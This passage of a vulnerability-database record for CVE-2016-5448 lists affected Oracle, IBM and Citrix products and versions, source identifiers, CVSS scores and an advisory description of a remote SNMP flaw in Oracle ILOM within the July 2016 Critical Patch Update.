"13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy 
automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, 
{ model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: 
"healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic 
infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: 
"application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", 
version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "CNNVD", id: "CNNVD-201607-812", }, { db: "NVD", id: "CVE-2016-5448", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003876", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, ], trust: 0.6, }, cve: "CVE-2016-5448", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 6.4, confidentialityImpact: "NONE", exploitabilityScore: 10, id: "CVE-2016-5448", impactScore: 4.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:L/Au:N/C:N/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 6.4, confidentialityImpact: "NONE", exploitabilityScore: 10, id: "VHN-94267", impactScore: 4.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:N/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "LOW", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", exploitabilityScore: 3.9, id: "CVE-2016-5448", impactScore: 2.5, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5448", trust: 1, value: "MEDIUM", }, { author: "NVD", id: "CVE-2016-5448", trust: 0.8, value: "Medium", }, { author: "CNNVD", id: "CNNVD-201607-812", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-94267", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2016-5448", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ 
{ db: "VULHUB", id: "VHN-94267", }, { db: "VULMON", id: "CVE-2016-5448", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "CNNVD", id: "CNNVD-201607-812", }, { db: "NVD", id: "CVE-2016-5448", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect integrity and availability via vectors related to SNMP. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border 
Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'SNMP' protocol. 
